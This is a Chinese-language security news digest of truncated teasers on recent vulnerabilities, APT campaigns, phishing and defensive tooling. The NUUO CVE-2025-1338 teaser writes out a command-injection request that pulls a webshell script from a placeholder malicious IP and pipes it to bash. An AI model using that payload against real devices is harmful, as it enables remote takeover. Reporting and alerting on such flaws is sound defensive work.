DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞(CVE-2025-0282)攻击日本 会杀毒的单反狗 军哥网络安全读报 2025-04-28 01:03 导读 网络安全研究人员警告称,一种名为 DslogdRAT 的新恶意软件在利用 Ivanti Connect Secure (ICS) 中现已修补的安全漏洞部署。 JPCERT/CC 研究员 Yuma Masubuchi在周
继续阅读Planet Technology 工业交换机漏洞可导致设备被接管 会杀毒的单反狗 军哥网络安全读报 2025-04-28 01:03 导读 网络安全公司 Immersive 发现影响中国台湾网络设备制造商 Planet Technology 生产的网络管理工具和工业交换机的严重安全漏洞。根据该公司的博客文章,漏洞可能导致攻击者能够接管受影响的网络设备。 Immersive 的安全研究员 Kev
继续阅读Apache Calcite惊现高危漏洞!数据库连接竟成黑客后门? 云梦DC 云梦安全 2025-04-28 01:01 一、漏洞原理揭秘 核心杀伤力: // 致命代码片段 String className = config.httpClientClass(); Class<?> clazz = Class.forName(className); Constructor<?>
继续阅读核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338) 云梦DC 云梦安全 2025-04-28 01:01 0x01 漏洞杀伤链 攻击向量: GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1 Host: target-ip 实现效果: ✅ 任意命令执行(代码注入) ✅ /e
继续阅读别怪技术不够硬,网络钓鱼拿捏的就是“人性漏洞” 安小圈 2025-04-28 00:45 安小圈 第655期 数据安全 · 勒索软件 网络钓鱼依旧是重要的网络安全威胁,即便受过良好教育、具备专业网络安全人员也难以幸免。钓鱼攻击早已摆脱最初粗糙的垃圾邮件形态,转而走向高度个性化与精细化,足以欺骗世界各地的企业用户。其成功原因不仅在于安全意识不足,更在于攻击者借助社工手法,利用人在压力下的思维与行为模
继续阅读Wazuh监视恶意命令执行 原创 网络安全菜鸟 安全孺子牛 2025-04-28 00:33 点击蓝字,关注我 1.简介 1.1 功能简介 Auditd 是 Linux 系统原生的审计实用程序。它用于 Linux 终结点中的记账操作和更改。 在 Ubuntu 端点上配置 Auditd,以考虑给定用户执行的所有命令。这包括用户在模式下或更改为 root 用户后运行的命令。您可以配置自定义 Wazuh
继续阅读漏洞环境 | AscensionPath 浅安 浅安安全 2025-04-28 00:01 注:仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。 0x00 简介 AscensionPath是一个基于Docker容器化技术的漏洞环境管理系统。 0x01 功能说明 – 环境管理 权限控制 开发支持 安全机制 0x02 项目地
继续阅读漏洞预警 | PyTorch远程命令执行漏洞 浅安 浅安安全 2025-04-28 00:01 0x00 漏洞编号 – # CVE-2025-32434 0x01 危险等级 – 高危 0x02 漏洞概述 PyTorch是一个开源的深度学习框架,广泛用于机器学习和人工智能领域。 0x03 漏洞详情 CVE-2025-32434 漏洞类型: 命令执行 影响: 执行任意代码 简述
继续阅读漏洞预警 | 金蝶云星空反序列化漏洞 浅安 浅安安全 2025-04-28 00:01 0x00 漏洞编号 – # 暂无 0x01 危险等级 – 高危 0x02 漏洞概述 金蝶云星空是一款基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。 0x03 漏洞详情 漏洞类型: 反序列化 影响: 远程命 令执行 简述: 金蝶云星空 的Busines
继续阅读CVE-2025-43859:Python h11 HTTP 库中的请求走私漏洞 NightTeam 夜组OSINT 2025-04-28 00:00 漏洞描述 h11 是一个极简的、与 I/O 无关的、用 Python 编写的 HTTP/1.1 协议库,该库中发现了一个严重漏洞,编号为 CVE-2025-43859。该漏洞的 CVSS 评级为 9.1,当 h11 与配置错误或存在缺陷的 HTTP
继续阅读我如何从已删除的文件中赚取 64 美元 — 一个漏洞赏金故事 haidragon 安全狗的自我修养 2025-04-27 23:26 TL;DR — 我构建了一个自动化功能,克隆和扫描了数以万计的公共 GitHub 存储库以查找泄露的机密信息。对于每个存储库,我恢复了已删除的文件,找到了悬空的 blob 和解压缩的 .pack 文件,以便在其中搜索公开的 API 密钥、令牌和凭据。最终报告了
继续阅读2025 年第一季度漏洞利用趋势 原创 vulncheck 喵苗安全 2025-04-27 16:11 已知被利用漏洞(Known Exploited Vulnerabilities,本文简称 KEV) 指的是已经被证实在现实中被攻击者利用过的漏洞。也就是说,这类漏洞不仅存在理论上的风险,而是已经有实际攻击案例,在野(in the wild)被利用过。 美国 CISA(网络安全与基础设施安全局)
继续阅读如何利用隐藏功能点发现SQL注入漏洞和注入绕过技巧|挖洞技巧 lo2us/消失的.. 渗透安全HackTwo 2025-04-27 16:01 0x01 前言 在渗透测试过程中,SQL注入依然是最常见的漏洞之一。通过对目标网站的不断探索和漏洞分析,我们发现了该站点的SQL注入问题,并通过一系列绕过手段成功获取了数据库信息。本文记录了从发现漏洞到成功利用的整个过程,分享了一些典型的绕过技巧和方法,
继续阅读Steam 客户端漏洞 &&从csgo角度看待网络安全 原创 梅苑 梅苑安全 2025-04-27 15:43 Steam 客户端漏洞 原文链接: https://hackerone.com/reports/667242 打开特定的 steam:// URL 会覆盖任意位置的文件 如果用户打开 steam://devkit-1/list-shortcuts?response=/tm
继续阅读记一次漏洞复现威胁情报导致的漏洞 原创 湘南第一深情 湘安无事 2025-04-27 14:12 声明: 由于传播、利用本公众号湘安无事所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢! 0x00前言 起因是 3月份下班坐地铁 无聊 在wx公众号
继续阅读【成功复现】CrushFTP身份认证绕过漏洞(CVE-2025-2825) sec0nd安全 2025-04-27 14:05 网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍CrushFTP 是由 CrushFTP LLC 开发的文件传输服务器软件,它的主要用途是提供安全、可靠的文件传输服务。它允许用户通过
继续阅读今天省 1 千漏洞修复费,明天赔 10 万应急款:漏洞沉默成本到底如何算? sec0nd安全 2025-04-27 14:05 友情提醒 本文阅读时间推荐10min 如想讨论 以下内容 ▼ 欢迎关注公众号联系我哟 ▼ OSCP备考经验(已通过认证) CISSP备考经验(已通过认证) CCSK(云安全)(已通过认证) ISO/IEC 27001 Foundation(已通过认证) 01 文章背景 在
继续阅读【安全圈】CVE-2025-3248:Langflow 开源平台严重远程代码执行漏洞威胁 AI 工作流安全 安全圈 2025-04-27 11:01 关键词 安全漏洞 网络安全研究人员在 Langflow 中发现了一个严重的远程代码执行(RCE)漏洞。Langflow 是一个被广泛用于以可视化方式构建由人工智能驱动的智能体和工作流程的开源平台。 这个高严重性漏洞被编号为 CVE-2025-3248
继续阅读盛邦安全获评“国家信息安全漏洞库(CNNVD)一级技术支撑单位” 盛邦安全WebRAY 2025-04-27 10:47 近日,盛邦安全荣膺“国家信息安全漏洞库CNNVD一级技术支撑单位”称号,这一殊荣充分肯定了公司在漏洞研究、0day输出、应急响应以及在野漏洞跟踪分析等方面的卓越能力。 作为始终站在攻防对抗前沿的网安企业,盛邦安全凭借自主研发的漏洞挖掘引擎,结合多年来在漏洞深度分析、自动化风险评
继续阅读每周网安资讯 (4.22-4.27)|Johnson Controls ICU漏洞预警 交大捷普 2025-04-27 10:15 2025[ 每周网安资讯 ]4.22-4.27 网安资讯 1、全国数标委公开征求《可信数据空间 技术架构(征求意见稿)》技术文件意见 为贯彻落实《国家数据基础设施建设指引》《可信数据空间发展行动计划(2024—2028年)》等政策文件要求,充分考虑可信数据空间作为数据
继续阅读SAP修复已遭利用的0day漏洞 Bill Toulas 代码卫士 2025-04-27 10:12 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 SAP 公司紧急修复位于 NetWeaver 中的一个远程代码执行 (RCE) 0day 漏洞,它可用于劫持服务器。 该漏洞的编号是CVE-2025-31324,CVSS评分10分,是一个位于SAP NetWeaver Visual Compo
继续阅读Craft CMS RCE利用链用于窃取数据 Lawrence Abrams 代码卫士 2025-04-27 10:12 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Orange Cyberdefense 公司提到,Craft CMS 中存在两个漏洞,可用于攻陷服务器和窃取数据。 这两个漏洞是由 Orange Cyberdefense 公司的部门CSIRT在调查一台受陷服务器时发现的。这
继续阅读CVSS10分!Erlang/OTP SSH远程代码执行漏洞安全风险通告 应急响应中心 亚信安全 2025-04-27 10:07 今日,亚信安全CERT监控到安全社区研究人员发布安全通告,Erlang/OTP存在一个远程代码执行漏洞,编号为 CVE-2025-32433。攻击者可以通过构造特定 SSH 协议消息,在未进行身份验证的情况下在受影响的系统上执行任意代码。这一漏洞使得攻击者能够获取系统
继续阅读【已复现】Craft CMS generate-transform 反序列化代码执行漏洞(CVE-2025-32432) 原创 安全探索者 安全探索者 2025-04-27 10:07 ↑点击关注,获取更多漏洞预警,技术分享 0x01 组件介绍 Craft CMS 是一个灵活、用户友好的内容管理系统,用于创建自定义的数字网络体验和其他体验。 搜索语法: app=”craft-cms&#
继续阅读同步漏洞行动:朝鲜Lazarus APT组织针对韩国供应链发起攻击 FreeBuf 2025-04-27 10:06 与朝鲜有关的Lazarus组织在一项名为”同步漏洞行动”(Operation SyncHole)的网络间谍活动中,针对至少六家韩国企业发起攻击。 卡巴斯基研究人员报告称,这个朝鲜背景的APT(高级持续性威胁)组织自2024年11月以来持续活跃,采用水坑攻击手
继续阅读【工具分享】SMS_Bomb_Fuzzer漏洞挖掘之短信轰炸辅助绕过插件 秀龙叔 黑客之道HackerWay 2025-04-27 09:58 简介: SMS_Bomb_Fuzzer是一个为Burpsuite设计的插件,主要用于辅助进行短信轰炸测试。它集成了多种绕过策略和数据变形方法,旨在帮助安全研究人员评估系统在面对恶意构造的请求时的安全性。该插件默认情况下是使用JDK 1.8版本进行编译的,这
继续阅读SAP NetWeaver中存在严重漏洞,面临主动利用威胁 原创 David Jones 信息安全D1net 2025-04-27 09:44 点击上方“蓝色字体 ”,选择 “设为星标 ” 关键讯息,D1时间送达! 已观察到攻击者正在投放webshell后门程序,研究人员警告称,该应用程序在政府机构中颇受欢迎。 安全研究人员警告称,黑客正在积极利用SAP NetWeaver Visual Comp
继续阅读【免费领】超400页!Android系统漏洞实战权威指南 蚁景网络安全 2025-04-27 09:35 点击蓝字/关注我们 今日福利 世界顶尖级黑客倾力编著 最全面的一本Android系统安全手册 利用工具结合实例详解安卓系统漏洞实战 限时福利,请及时领取哦 ~ 该资料内容较多,无法列出全部目录,以下为节选的部分目录: 扫描下方二维码 ,回复 “0427” , 即可免费领取 ~ (限7日内领取)
继续阅读猎洞时刻漏洞挖掘SRC培训第三期塞满干货来袭! 原创 猎洞时刻 猎洞时刻 2025-04-27 09:27 免责声明 本课程旨在培养具备合法合规网络安全技能的白帽子安全研究人员,专注于网络安全漏洞挖掘与防护技术。任何参与本课程的学员,均需承诺遵守国家法律法规,严格遵守网络安全行业的道德规范。 严禁黑灰产及违法行为:本课程严禁任何从事黑灰产
继续阅读工信部:关于防范WinRAR安全绕过漏洞的风险提示 安全内参 2025-04-27 09:06 关注我们 带你读懂网络安全 攻击者可构造恶意链接诱导用户点击,导致恶意代码执行等危害。 近日,工业和信息化部网络安全威胁和漏洞信息共享平台(NVDB)监测发现,WinRAR存在安全绕过高危漏洞。 WinRAR是德国RARLAB公司开发的压缩文件管理工具,广泛用于数据压缩、备份和文件传输。由于WinRAR
继续阅读